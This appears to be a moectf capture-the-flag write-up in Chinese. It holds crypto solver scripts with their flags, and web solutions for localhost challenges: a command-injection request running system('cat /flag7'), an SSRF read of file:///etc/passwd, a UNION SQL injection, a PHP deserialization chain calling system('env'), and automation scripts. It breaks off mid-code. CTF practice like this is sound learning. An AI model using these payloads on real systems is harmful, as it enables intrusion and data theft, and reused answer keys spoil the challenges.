cipin = "_flagetoinsrhdcumwypbvkxjqz0123456789FLAGETOINSRHDCUMWYPBVKXJQZ/=+"
cipin='0123456789'
for tp in product(cipin, repeat=6):
# print(tp)
secrets = '2100%s%s%s%s%s%s'% tp
# print(secrets)
# print(len(secrets))
hash_value = sha256(secrets.encode()).hexdigest()
# print(hash_value)
if hash_value== '3a5137149f705e4da1bf6742e62c018e3f7a1784ceebcb0030656a2b42f50b6a':
print(secrets)
print(len(secrets))
input()
baby_equation
moectf{7he_Fund4m3nt4l_th30r3m_0f_4rithm3tic_i5_p0w4rful!}
import gmpy2
from Crypto.Util.number import *
gift=4*0x2227e398fc6ffcf5159863a345df85ba50d6845f8c06747769fee78f598e7cb1bcf875fb9e5a69ddd39da950f21cb49581c3487c29b7c61da0f584c32ea21ce1edda7f09a6e4c3ae3b4c8c12002bb2dfd0951037d3773a216e209900e51c7d78a0066aa9a387b068acbd4fb3168e915f306ba40
x_y = gmpy2.iroot(gift,2)[0]
div = divisors(x_y)
for i in div:
flag1 = long_to_bytes(int(i-1)) # a+1对应 -1
if b'moe' in flag1 or b'flag' in flag1 or b'ctf' in flag1 :
print(flag1)
flag2 = long_to_bytes(int(x_y//i+1)) # b-1对应 +1 一定要//
print(flag2)
大白兔
解同余方程,如N= pq c1 = (2p + 3q)**e1 mod N c2 = (5p + 7*q)**e2 mod N-腾讯云开发者社区-腾讯云 (tencent.com)
import math
import gmpy2
from Crypto.Util.number import long_to_bytes
e1 = 12886657667389660800780796462970504910193928992888518978200029826975978624718627799215564700096007849924866627154987365059524315097631111242449314835868137
e2 = 12110586673991788415780355139635579057920926864887110308343229256046868242179445444897790171351302575188607117081580121488253540215781625598048021161675697
N = 107840121617107284699019090755767399009554361670188656102287857367092313896799727185137951450003247965287300048132826912467422962758914809476564079425779097585271563973653308788065070590668934509937791637166407147571226702362485442679293305752947015356987589781998813882776841558543311396327103000285832158267
c1 = 15278844009298149463236710060119404122281203585460351155794211733716186259289419248721909282013233358914974167205731639272302971369075321450669419689268407608888816060862821686659088366316321953682936422067632021137937376646898475874811704685412676289281874194427175778134400538795937306359483779509843470045
c2 = 21094604591001258468822028459854756976693597859353651781642590543104398882448014423389799438692388258400734914492082531343013931478752601777032815369293749155925484130072691903725072096643826915317436719353858305966176758359761523170683475946913692317028587403027415142211886317152812178943344234591487108474
c = 21770231043448943684137443679409353766384859347908158264676803189707943062309013723698099073818477179441395009450511276043831958306355425252049047563947202180509717848175083113955255931885159933086221453965914552773593606054520151827862155643433544585058451821992566091775233163599161774796561236063625305050
n = N
e = 65537
q = math.gcd(n, pow(c1, e2, n)*pow(2,e1*e2,n) - pow(c2, e1, n)*pow(3,e1*e2,n))
p = n // q
# Standard RSA
phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(m)
print(long_to_bytes(m).decode())
# moectf{Sh4!!0w_deeb4t0_P01arnova}
ezlegendre
勒让德符号判断离散对数是否有解【算法讲18:二次剩余】勒让德符号 | 欧拉判别法 | Cipolla 算法-CSDN博客
p = 303597842163255391032954159827039706827
a = 34032839867482535877794289018590990371
n = [278121435714344315140568219459348432240, 122382422611852957172920716982592319058, 191849618185577692976529819600455462899, 94093446512724714011050732403953711672, 201558180013426239467911190374373975458, 68492033218601874497788216187574770779, 126947642955989000352009944664122898350, 219437945679126072290321638679586528971, 10408701004947909240690738287845627083, 219535988722666848383982192122753961, 173567637131203826362373646044183699942, 80338874032631996985988465309690317981, 61648326003245372053550369002454592176, 277054378705807456129952597025123788853, 17470857904503332214835106820566514388, 107319431827283329450772973114594535432, 238441423134995169136195506348909981918, 99883768658373018345315220015462465736, 188411315575174906660227928060309276647, 295943321241733900048293164549062087749, 262338278682686249081320491433984960912, 22801563060010960126532333242621361398, 36078000835066266368898887303720772866, 247425961449456125528957438120145449797, 843438089399946244829648514213686381, 134335534828960937622820717215822744145, 74167533116771086420478022805099354924, 249545124784428362766858349552876226287, 37282715721530125580150140869828301122, 196898478251078084893324399909636605522, 238696815190757698227115893728186526132, 299823696269712032566096751491934189084, 36767842703053676220422513310147909442, 281632109692842887259013724387076511623, 205224361514529735350420756653899454354, 129596988754151892987950536398173236050, 97446545236373291551224026108880226180, 14756086145599449889630210375543256004, 286168982698537894139229515711563677530, 100213185917356165383902831965625948491, 268158998117979449824644211372962370753, 264445941122079798432485452672458533870, 87798213581165493463875527911737074678, 131092115794704283915645135973964447801, 164706020771920540681638256590936188046, 178911145710348095185845690896985420147, 154776411353263771717768237918437437524, 260700611701259748940616668959555019434, 222035631087536380654643071679210307962, 281292430628313502184158157303993732703, 24585161817233257375093541076165757776, 269816384363209013058085915818661743171, 39975571110634682056180877801094873602, 125235869385356820424712474803526156473, 218090799597950517977618266111343968738, 144927096680470512196610409630841999788, 213811208492716237073777701143156745108, 64650890972496600196147221913475681291, 302694535366090904732833802133573214043, 214939649183312746702067838266793720455, 219122905927283854730628133811860801459, 224882607595640234803004206355378578645, 260797062521664439666117613111279885285, 279805661574982797810336125346375782066, 147173814739967617543091047462951522968, 23908277835281045050455945166237585493, 186338363482466926309454195056482648936, 295140548360506354817984847059061185817, 151948366859968493761034274719548683660, 96829048650546562162402357888582895187, 61129603762762161772506800496463804206, 83474322431616849774020088719454672415, 25094865151197136947956010155927090038, 86284568910378075382309315924388555908, 269311313874077441782483719283243368999, 293865655623484061732669067594899514872, 42618744258317592068586041005421369378, 54330626035773013687614797098120791595, 147903584483139198945881545544727290390, 290219451327796902155034830296135328101, 147951591390019765447087623264411247959, 176721307425594106045985172455880551666, 10617017342351249793850566048327751981, 166002147246002788729535202156354835048, 43653265786517886972591512103899543742, 191250321143079662898769478274249620839, 142288830015965036385306900781029447609, 231943053864301712428957240550789860578, 259705854206260213018172677443232515015, 42547692646223561211915772930251024103, 210863755365631055277867177762462471179, 140297326776889591830655052829600610449, 136970598261461830690726521708413303997, 93221970399798040564077738881047391445, 192314170920206027886439562261321846026, 95904582457122325051140875987053990027, 158334009503860664724416914265160737388, 134039922705083767606698907224295596883, 7789601161004867293103537392246577269, 261069289329878459425835380641261840913, 123743427894205417735664872035238090896, 20126583572929979071576315733108811761, 5317214299018099740195727361345674110, 68965882674411789667953455991785095270, 235934145208367401015357242228361016868, 250709310980093244562698210062174570956, 167048130489822745377277729681835553856, 122439593796334321806299678109589886368, 117953800124952553873241816859976377866, 226311466875372429157352019491582796620, 301401080214561977683439914412806833619, 255816105091394723475431389696875064495, 73243049441397892506665249226961409560, 226985189100195407227032930008331832009, 164462051705780513134747720427967016844, 97905180778488273557095248936896399883, 40737879120410802220891174679005117779, 180413920169781019749877067396006212488, 171309368917976988181007951396904157090, 215065878665354148046787050342635722874, 54225964222741166664978354789209176721, 179980445108969868669560591527220171967, 39118880593034932654127449293138635964, 170210538859699997092506207353260760212, 62152643864232748107111075535730424573, 28285579676042878568229909932560645217, 69823876778445954036922428013285910904, 170371231064701443428318684885998283021, 211884923965526285445904695039560930451, 2912793651373467597058997684762696593, 220544861190999177045275484705781090327, 142755270297166955179253470066788794096, 264271123927382232040584192781810655563, 214901195876112453126242978678182365781, 252916600207311996808457367909175218824, 176399700725319294248909617737135018444, 230677646264271256129104604724615560658, 1568101696521094800575010545520002520, 276644650735844694794889591823343917140, 185355461344975191330786362319126511681, 248497269558037476989199286642120676823, 27426372552503547932146407600438894266, 99885839446999373024614710052031031159, 238693364649026611386487480573211208980, 27047849084544903200283111147329657123, 261687609401872239323715016608713989139, 34926503987070847956303036393611830590, 252495954285655595492775877967398282722, 249358827602419141539353237669905281246, 42551212101869966935955269842854722856, 286527336123436427709115043975536071462, 158097411156207320921055042509886995091, 40982984899524424348979403377331335675, 87268254405858939730919659372073314983, 142920872841164853694746048293715385493, 280344634952903421792629929689092857993, 203584314487374069738101729666435007339, 76747904284507590577908045394001414841, 18608573158088521401404614102481693137, 104158289118605398449367221892619783009, 182616719368573751169836443225324741716, 272025723760783252166092979911587562064, 24194069309604403496494752448487752613, 71973842397785917741048132725314885345, 281558046604363121112749722271741416764, 66965324704079734796576428718112513855, 105222756356650324548621319241035836840, 331654051401420900830576011369146182, 131087815164777263900650262777429797113, 76104729920151139813274463849368737612, 163253554841934325278065946152769269296, 35973933431510942249046321254376084104, 223355354158871484030430212060934655984, 181704973473887713398031933516341967465, 131391458395622565487686089688656869743, 153029062510158353978320224242258979076, 75598349867958834632866616947240059419, 107656133091853571710502064573530657194, 261653899003034450454605322537555204702, 102387069931966536076616272953425585051, 174654548539988861301269811985320013260, 30731762585661721683653192240732246059, 265493340795853624586170054917042208660, 174818040730242275465453007894471517233, 99514915046145707535310601810631334278, 133978892607644700903700803642408771370, 216019770199630171637325931783378096100, 76687884966028369399497157007109898467, 262185741950606001987209986574269562289, 101935410844521914696784339882721918198, 85956270718878931834010975962772401589, 117578315837774870077915813512746446219, 209811226703488479967593762805568394383, 85782228978690599612110880989543246041, 234993402267259336147096170367513324439, 158487299348452041021565296682698871789, 159701431055714867184644360639841355076, 109022557288733938098734847159477770521, 20764822884655633017647117775843651332, 144987524936939260617020678038224835887, 214906746504968333094519539609226540495, 61852186870193663367998110214331582115, 90175894032076080713807606548780168998, 283504071501037047650569090140982777586, 267695305479884628857258564337611106120, 2466175482923380874813569827625743835, 62561740902965346823256447383892272796, 181458673990444296212252831090106274182, 151903421483215372136947284355251617709, 19545903652854510304023406921387221130, 219205004027218279279153442572018305650, 62495663621315535552427938857863551873, 12365469869484359722316573851483855865, 84444120685499458796249283893323932282, 240719245204462516267560756675192129462, 27868242791206675092288978266113368469, 231956104988320170956546781095814860314, 238410591787987745803829175586952288627, 290649141309468101840354611586699479851, 288298044918505512172272603794059992911, 43375655853069820305921366762777897508, 195308577786654489057887409352840304641, 184459971400898842809886506207633536394, 255884612697066296714973816950917234211, 8695922085804648269560669225439485137, 109407350389195091443836128149623969417, 40151058765649465408124869078260007620, 125484946058191366826510549493690011718, 71132588066103752922321942940739808864, 74434669478187680319595294456652807097, 187368213679294937718535073296853726111, 63461505676143678393259420949793811831, 131619805472714703711458729455838994067, 8579657158619864010437706463902003097, 60626278761876782233388469543817973673, 44776499706241603722632560896220653186, 257249861781237389988455384617803171877, 161899873165011719282095749671993720527, 73303482092538159761390536102771615311, 141674253732456103774983358188317473860, 112299149158347774069079224861237069975, 192409969047313867540459549167233638120, 52560717143548208264188844553309600513, 209294007943747095607573416682772182613, 65285862009539442533024037477398617382, 141465096635701758351979378177631042196, 282970656853503001128091562858564344839, 50475483578642585644452991078499278745, 162546597698227455939743094437394415689, 65258447920153625609456176138520078583, 25184730952052088803921023041299838584, 228883100940853988548836641050823478387, 234342509561041384559923481191578502671, 96929129863331626375704681481278825323, 288533470498072097357398960101692503873, 202238020435442160571930572760188491021, 179010548891454398845389500871076122861, 210509821764943794358893224681677583929, 301357944197101288505771002301759006254, 188933290023352627523422420332593360537, 207946655777875200521742190622482472884, 288626263488145443150622420747070805416, 75616301779108425588545170038742534166, 58163857263381687168244101022135667109, 297006021514663344215599115965804102114, 297690420826548736122127126645053452341, 88307045391242971429880119414942510712, 186427606153958359494215188169120285788, 135488686276533521058776859854524444361, 185380054960856211260651416683468161990, 175033658667416561573078028845860911744, 223026004671602541191897755812121342354, 34657268786986063209312902409995458857, 120560332690000675303295481174067849230, 55304621833927249516093996383526467671, 111480233798478730015825495041130765708, 188996716801525995463705449722399676888, 276300230605454487705048192796463035731, 195951365841304132244984630163178946841, 97383655947416522972353051984313703380, 94486945760999630041197414137963583839, 180706938513681126017333618518691884990, 291355503207799224380050183085704824037, 69034413486375685936282884707402207337, 147750870458026934714106830614187010708, 45030500748522416863096615057804736553, 242760053973560804002707125041520857401, 78549841097746795170488790352479728712, 2356186555504071026416878904180857750, 250486437623828232647064146324392061051, 23443836455198610186212360005846025976, 174557226633145985326629017377610499133, 105578481831185315088267357915446186040, 275620780071666328887795273613981325091, 23435505408737317601794562472269448966, 153209223406380813663608757935808571040, 298537417505667302508269715871007454162, 203833907122687718347615710181705388877, 41923370405573382737900061813058979798, 3762696947926387653032627637114050038, 201362054098012734707571348865729525585, 285561801443127226417656620776228615886, 111526376057659222252771678197929357387, 203857473647840873587593099562928738804, 44500972779851392967974092230683443589, 131565609415497588649207556985146740667, 118140388348838985266223643241117982200, 151449885527204880099343472664885565851, 296392921256617994387220911796693904909, 171323803851876663161606688343678019752, 77152982746512263077542395226111426871, 71648764903315646849225859605038798241, 204032734481806785543119754456569617316, 6308687907566364067313782129902290691, 16601010504475415688487155708691097587, 267844409827567109183739120606590016153, 8224746302136608660764206696943998066, 66759882079234093195284745682061177129, 246382951504754280882643835151081337286, 255668159720160142170457715248631352728, 198682585307670767869381177003851088434, 52435298055396076040371814840062860322, 71487031168170283085378067681578926209, 19270201008106231446848331516948751837, 259975200953378762173082382130139147342, 100957428421542421187997144087873975651, 208596806512779765020431672051552927799, 299145970783704112359526450087000033589, 150947534399996219237186223933189906692, 2048564430495506099844799218948689248, 18962488382754079143174369765373573160, 123031997265327646442638576943887737076, 244982544573374061178705105734141424990, 146410849043938910996544914770892579969, 223289253099676841267315311685506771609, 51374350072145272462874563304717832675, 11071799523780604861063183113721965515, 64879815349665030137608387728274669513, 80407660651138778640313857555610913997, 303240361297474032656368918727922343524, 103535171867293830164396688627880762056, 80560992291681297484967629700766125368, 143230791823232014720768325847406122476, 188716605362804777650654549500430035344, 232870220205325961834389425482865329315, 283584919111555062850512413920721407255, 206566027046056486360456937040463884619, 157265544558229360994066706355140059167, 234540100059557817987307855523008271441, 145080729935010940836509908225154438654, 87632901547252991486640361323948527297, 132851295075144433057295220850764336697, 119332580967710872282556206817561230364, 252662535367310697404410284791596079390, 116953597995893914045234747272641030589, 100249498080127826743176896590140549012, 136127222991007877469608037092253387587, 293872159333237281344632727438901916796, 188380258232793584033919525452891729603, 1610116068556601814921533488550773010, 227538093179017809788576278302184723209, 96083211912155805281570727244009758189, 177565192075026414675108774674272650977, 48610376097473152433617435307712235835, 247706157308906487216795222963091222950, 158089460554439410339817265377357657075, 242596743543458727108836420358578527964, 157838486547678450498998359338995593594, 154936428786673098370270244313756793764, 230069001282099253337070315838992422706, 302203905412042965194022309363722872023, 278925578180003228386990239779184911424, 2121847168422140085785053284950978779, 88186566913792352545205577594300112005, 127051055548524716972172930848069016819, 216775577660712694343189516378309335187, 44934779747684486400910901018161470888, 32429597712898788634301884219187226083, 219683174528279300995710495669083670544, 37001671152735870067433052249003677244, 40408367335919429215031155701333780256, 156957056705864208022145617831060134907, 180077610045061934161783737112285900966, 59357544819520045255625797086421901884, 77751400794807935281264495346525107329, 4517615764752715802675887411287287137, 76319782726782483955139757169428276003, 176009402215469456144386392247781430661, 283055695252017869386094188584670242363, 20001716567499724882317501875143788088, 125228382132280749989067609697418628387, 144053090751393640875176862167012247830, 15289106046221987660093620422889539867, 111243866573605033251079958638430165633, 169264885994758018612038619809803723688, 11895954311759483419234457833286931577, 273147053963507607445612310063799123998, 158981773284803069491507978382595811562, 41293513794446810141896116395025053234, 57441237860743029006005815967510568612, 109171476551418034153338841133917497633, 136539712287056106151501004438585146777, 278918550892367788720071091355436733468, 211360251223022250021398148918837686812, 254351242496347083009146404917085951637, 130260153203964833202474997491055897705, 221930288825889900517852991745469270910, 66354211799382156899053592476719001842, 127898620670768976254134750731374490934, 298131830425274848646460016809595859328, 132109510144911727511061804395381822418, 210917766469026421985352121201196497206, 5441137715689271309917542693016936841, 209516950406881264617228336887254107528, 92275151703152148383106907311559718841, 46255650973652148247469464088017660080, 182628529221607295465655096378164148336, 52574278547120304143820897608762444985, 63698472804719856407197390836793525437, 30457182690865024857724004613999433676, 212073418196280214618461610817423630022, 48875930775858981513092672396243080640, 113234797533868946026347891158142991388, 256534108458875318962058222544020064164, 22522715662428558833985333846937440705, 97553118958308509177643330175409499003, 197088081433425221073434635573357125592, 157303116668734020456228309942188293059, 110316346669278795114546305726864504681, 228887397917708007004920589862367347873, 112210930213921962308944716344585917343, 95017760786235266842788931502689331157, 303479014347753799316861720146531596843, 138677197920058856282155251074088437081, 285912176726299387362893467150449209426, 120309832759140713296686339140142433386, 279125897926861811239250830750932241600, 289502053647872994218190050825294169535, 262459212837236162171047720358005836712, 290390838897912466575239533978002826151, 292988850197951752250595007039860868400, 34796135808311610468205608686622819504, 25206338413385638687826160218013868658, 42180804482932648992176529097078580055, 195897225052351816559125785179252565465, 290060760535408066224831756224248708027, 34243626514368402883316460494646065629, 159497726968729366867935528734367549832, 267785772871046662107247674801793846921, 47342328853090920958565777290912999560, 194980176549393239742230551297786993434, 88020247887557921707284362381274951852, 255474100333005567974457204812640809071, 93324791124684170744053910877870176609, 69542826141091170218040988642070014011, 188678529221313094426441439309063681864, 56030802691247887446204447769438570825, 74312207153349149422500961216106557393, 153811406554673020809393530896156460494, 130232956128662318657579623819323546361, 241587755919930468705435097001858194189, 150548598672513907492388638742866339038, 38780469811591978249139697733603217652, 237554030153815380781978075720171312418, 96541634878634946114738393982914693394, 83284071476491638125716901346418260661, 277535192833115492238855935055373371297, 92291115416977028401374199691398676627, 105634075531674200869064066234662065605, 59669321288506854711632528171527160495, 24913178886798791108798737682436779604, 191902245938756063865405758957515936934, 200833770402179506644143905670947994664, 249327029439265065126080906281744759655, 2368715218056973901783211260781833927, 133209645820509536502329231321782644514, 170083361139958757944996287868734988169, 143242266754832252556264383809361085258, 198438133508477313319510861550461456953, 226416574016152349355240811564666677855, 131995850810926550122710727062184985075, 206211971624338783828953817981719254101, 95022339713176475801874420969255633409, 39239785273544046574575511790952158726, 6761950061835300419279903725369635970, 160849355761964483498641169767552240859, 44129081383649229398785011378026849128, 116611486899507912253396257166983831123, 102748760887182142877957834312659347601, 100973668783270797012352094429175531207, 110548564207426762905750742091610942634, 205424582078496700107783237952155124442, 210932790939110827079725957948996247757, 54413304958149902897514912130730392489, 181315803651356180100745517014898850424, 183346938138867395962624263310328788228, 133507835720650939452036529283981720094, 244220649646693249242542702657146329679, 111814540087048948955999016117121133729, 210757262617434713384638061648414714521, 31712005436857719771604404352654183712, 299210790483067037892753875410776716305, 34216439939230284515095120240039231491, 246820219620854547856488049434101568744, 298588211282375015522910461809769779222, 53320103067319149790078933423751044737, 164977173816081040725650999609390274279, 234782977255751828939911143180631329578, 61521250269407451751766565186333346163, 119529895182262920689181379893081203421, 154588465395872896210615516764102943961, 153034255402211966905777978896125271527, 65497510688725487475002809757533544579, 76824114145168270682129892469858568031, 218064880554787781811938382300930885801, 196850060586188141836799779247809406205, 176023892018381269394229104598502170110, 32491776807255207889633110137157036238, 41150198830446315717651890670848632754, 260753023840843193587871227195221789744, 48345408122882987831052823644867513356, 80045935233531979816083287928071697883, 131878104259519592871955471048058374000, 15534379538690707223440448056318568055, 131291412522855581131329717355299310716, 37018675243998552749630837151597269431, 144343493968520204610097930388908478903, 67236444178494959708570043908346657722, 102574100831305499879105427279131095784, 249069309513964056714882166119752611668, 210718130986716991560768592011623825976, 266242407402824082344585571101593909650, 205203132247422842477137158586071965100, 301157372202750742637385626243753030679, 40886620741595313792996852647181029560, 253361171396328884567373946949359324229, 50071128101197582041162516700015376269, 106002417001877546867386840932652850816, 224086864980106045542532841236299648038, 42103921294151508500634063253613482845, 49777138159264482913170680298952908154, 24324534484842395819609478778764950811, 204106593629836179932302789646808274058, 266707066043760482642609614924857456238, 18723835069315957900598472598907945204, 244338819469013923747256697307964210342, 36296287172854997655950896217230267111, 292888671179451539882069138267865661448, 287111415651274690627399445990831389362, 79940439572496625318602146625920961720, 288270505176661814341807462681727466925, 153921178962139214138689743179633342125, 263564317934507756965522450042219801757, 197993323684501153884855839599466707355, 72143993205715719344183507132882267579, 67511075584002491895239101559049103979, 231396344630318648781207380069016790960, 268490084177254392405211695854127631350, 45968181401712207064942095991325993181, 34472329776995578971329318400545600788, 112967316661320871429337739209994987784, 209508577387521479468956337084132598710, 194445696189141465862938111222574992064, 229942079198360020568341753187100646148, 47944382795398541172186729027517882654, 54806201653083974379270761512143387910, 93457347627015900562505045196097224001, 152033139738914238723733340538181549419, 123719026823969669345162603978875451754, 154704533151410142607151617227929824563, 32428281285686815618553795197210513625, 265229864831280807254743597731258298440, 14904705423314872103792141735779112532, 177442398230615511669857060547212895616, 144918716871520627851549439448066637518, 203019416536984157536348865479415073573, 288452420706913930307744155709559750006, 282516471994395201735206793889605510595, 150722332251745138694381051866105655391, 234504581837296595003379465512031425988, 44178766618576668748878202507789103195, 217129489675072754441642067295058817201, 245087939287551829934600756568137757979, 240954534396950014938672406581264782638]
flag=[]
for c in n:
leg_symbol = legendre_symbol( c/a, p)
# 判断解的存在性
if leg_symbol == 1:
flag.append(0)
continue
# print(f"a is a quadratic residue modulo {p}, and there may be a solution.")
if legendre_symbol( c/(a+1), p) == 1:
flag.append(1)
continue
# print(f"a is not a quadratic residue modulo {p}, so there is no solution.")
# else:
print("The result is indeterminate.")
print(''.join(str(i) for i in flag))
moectf{minus_one_1s_n0t_qu4dr4tic_r4sidu4_when_p_mod_f0ur_equ41_to_thr33}
RSA_revenge
参考链接 ASIS 2015 总决赛:RSASR (crypto300) – /var/log/security/kt.log
def Brute_force(a, b, k):
if k == 256:
if a * b == n:
print(a, b)
input()
return 0
for i in range(2):
for j in range(2):
a1 = a + i * (2 ** (511 - k)) + j * (2 ** k)
b1 = b + j * (2 ** (511 - k)) + i * (2 ** k)
if a1 * b1 > n:
continue
if (a1 + 2 ** (511 - k)) * ((b1 + 2 ** (511 - k))) < n:
continue
if (a1 * b1) % (2 ** (k + 1)) != n % (2 ** (k + 1)):
continue
Brute_force(a1, b1, k + 1)
return 0
Brute_force(0, 0, 0)
new_system
moectf{gift_1s_present}
先看lcg公式求b,再化简取模,模逆
import gmpy2
from Crypto.Util.number import long_to_bytes
a1, c1 = 48152794364522745851371693618734308982941622286593286738834529420565211572487, 21052760152946883017126800753094180159601684210961525956716021776156447417961
a2, c2 = 48649737427609115586886970515713274413023152700099032993736004585718157300141, 6060718815088072976566240336428486321776540407635735983986746493811330309844
a3, c3 = 30099883325957937700435284907440664781247503171217717818782838808179889651361, 85333708281128255260940125642017184300901184334842582132090488518099650581761
q = 105482865285555225519947662900872028851795846950902311343782163147659668129411
# 确保分母不为零,并且为正数
denominator = a2 - a3 + a1
denominator = denominator % q # 确保分母为正数
if denominator == 0:
print("无法直接解出 x,因为分母为零。")
else:
numerator = c2 - c3 + c1
x = gmpy2.invert(denominator, q) * numerator % q
print(f"找到的秘密密钥 x: {x:d}")
gift1 = (c1 - a1 * x) % q
gift2 = (c2 - a2 * x) % q
gift = (c3 - a3 * x) % q
if gift == (gift1 + gift2) % q:
print('success x', x)
print('success gift1', gift1)
print('success gift2', gift2)
print('success gift', gift)
print(long_to_bytes( gift))
WEB
Web渗透测试与审计入门指北
moectf{H3r3'5_@_flYinG_kIss_f0r_yoU!}
运行源码
弗拉格之地的入口
http://127.0.0.1:2784/robots.txt
弗拉格之地的挑战
按提示闯关
POST /flag7fxxkfinal.php?a=2&moe=Flag HTTP/1.1
Host: 127.0.0.1:6927
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
referer: http://localhost:8080/flag3cad.php?a=1
Cookie: verify=admin; PHPSESSID=8d5643dbf3b034504b084eb45740b2b2; session=eyJjb2luIjpbMl0sImNvaW5fY291bnQiOjEsInBsYXllciI6ImQiLCJyb3VuZCI6LTEsInRpbWUiOjE3MjQwNDQ2MzMuMDIyNzEyfQ.ZsLVXg.7jD-C1iXRqEOkSkx-uSRx39LWgc; retainlogin=1; token=ad234ea9-bbc1-416d-b2f5-2bb3afb86e38; __wzd5cc1c8e9ac487aaec440=1724385077|00730c0a3b30
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
b=1&method=get&content=I%20want%20flag&moe=Flag&what=system('cat%20%2fflag7')%3b
ImageCloud前置
http://127.0.0.1:10441/index.php?url=file%3A%2F%2F%2Fetc%2Fpasswd
电院_Backend
d@d.cn' union select 1,2,3 #
pop moe
<?php
class class000 {}
class class001 {}
class class002 {}
class class003 {}
$c0 = new class000();
$c0->payl0ad=1;
$c0->what = new class001(); # protected $what; protected 可以加上 \00*\00 %00%2A%00 4+3
$c0->what->payl0ad = 'dangerous';
$c0->what->a = new class002();
$c0->what->a->sec = new class003();
$c0->what->a->sec->mystr='system(\'env\');';
echo urlencode(serialize($c0));
勇闯铜人阵
每次回答时cookie会变,服务端会校验
from time import sleep
import requests
from urllib.parse import quote
# 截取某字符串之后的字符串
def get_str(str, start, end):
str_start = str.find(start)
if str_start == -1:
return ""
str_start += len(start)
str_end = str.find(end, str_start)
if str_end == -1:
return ""
return str[str_start:str_end]
burp0_cookies = {"verify": "admin", "PHPSESSID": "8d5643dbf3b034504b084eb45740b2b2",
}
burp0_headers = {}
def start():
burp0_url = "http://127.0.0.1:4869/restart?"
res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
return (res.text)
def mingbai():
burp0_url = "http://127.0.0.1:4869/"
burp0_data = {"player": "d", "direct": "弟子明白"}
res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
# 获取requests.post返回的cookie
print(res.cookies['session'])
# print(res.headers)
# 修改字典
burp0_cookies['session'] = res.cookies['session']
return (res.text)
def answer(t1):
# 字符串去空格 去回车
t1 = t1.replace(" ", "")
t1 = t1.replace("\n", "")
# 逗号截取字符串
t2 = t1.split(",")
print(t2)
# 定义铜人阵字典
tz = {
"1": "北方",
"2": "东北方",
"3": "东方",
"4": "东南方",
"5": "南方",
"6": "西南方",
"7": "西方",
"8": "西北方",
}
flag = ''
if len(t2) == 1:
flag = tz[t2[0]]
else:
flag = tz[t2[0]] + '一个,' + tz[t2[1]] + '一个'
print(flag)
answer(post_ans(flag))
return flag
def post_ans(ans):
sleep(0.5)
burp0_url = "http://127.0.0.1:4869/"
# 转为url编输入
url_encoded_string = quote(ans)
burp0_data = {"player": "d", "direct": ans}
res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
# 获取requests.post返回的cookie
try:
print(res.cookies['session'])
except Exception as e:
print(e)
print(res.text)
# print(res.headers)
# 修改字典
burp0_cookies['session'] = res.cookies['session']
print(burp0_data)
res2 = get_str(res.text, "id=\"status\">", "</h1>")
print(res2)
return res2
print(get_str(start(), "id=\"status\">", "</h1>"))
t1 = get_str(mingbai(), "id=\"status\">", "</h1>")
answer(t1)
Re: 从零开始的 XDU 教书生活
获取学生字典-->学生账号AES加密-->获取token-->获取二维码参数-->批量签到
from time import sleep
import requests
import json
from tqdm import tqdm
requests.adapters.DEFAULT_RETRIES = 5 # 设置重连次数,防止线程数过高,断开连接
session = requests.Session()
session.keep_alive = False # 设置连接活跃状态为False
burp0_cookies = {"verify": "user", "PHPSESSID": "8d5643dbf3b034504b084eb45740b2b2",
"session": "eyJjb2luIjpbMl0sImNvaW5fY291bnQiOjEsInBsYXllciI6ImQiLCJyb3VuZCI6LTEsInRpbWUiOjE3MjQwNDQ2MzMuMDIyNzEyfQ.ZsLVXg.7jD-C1iXRqEOkSkx-uSRx39LWgc",
"retainlogin": "1", "token": "024816c9-d1f5-4ad4-96e0-e7f589e1dc34"}
burp0_headers = {"sec-ch-ua": "\"Chromium\";v=\"113\", \"Not-A.Brand\";v=\"24\"",
"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest",
"sec-ch-ua-mobile": "?0",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36",
"sec-ch-ua-platform": "\"Windows\"", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors",
"Sec-Fetch-Dest": "empty",
"Referer": "http://127.0.0.1:10156/widget/sign/pcTeaSignController/showSignInfo",
"Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
def get_names():
burp0_url = "http://127.0.0.1:10156/widget/sign/pcTeaSignController/showSignInfo1?activeId=4000000000000&webCacheId=4000000000000&appType=15&_=1724048261701"
res = session.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
json_str = json.loads(res.text)
new_list = []
# json 数组取出一列
json_str = json.loads(res.text)
# print(json_str['data']['changeUnSignList'][0]['name'])
for i in json_str['data']['changeUnSignList']:
# 添加到新数组
new_list.append(i['name'])
print(len(new_list))
return new_list
# AES加密一个文本
#
# # str不是16的倍数那就补足为16的倍数
# def add_to_16(value):
# while len(value) % 16 != 0:
# value += '\0'
# return str.encode(value) # 返回bytes
# 加密方法
# coding: utf-8
import base64
import binascii
from Crypto.Cipher import AES
class AESUtil:
encode_ = None
model = None
iv = None
key = None
aes = None
def init(self, key, model, iv, encode_='utf-8'):
self.aes = None
# 这里的密钥长度必须是16、24或32,目前16位的就够用了
def init_aes(self, encode_, model, iv, key):
self.encode_ = encode_
self.model = model
self.iv = iv.encode()
self.key = self.add_16(key)
self.BLOCK_SIZE_16 = AES.block_size
model_func = {'ECB': AES.MODE_ECB, 'CBC': AES.MODE_CBC}[self.model]
if self.model == 'ECB':
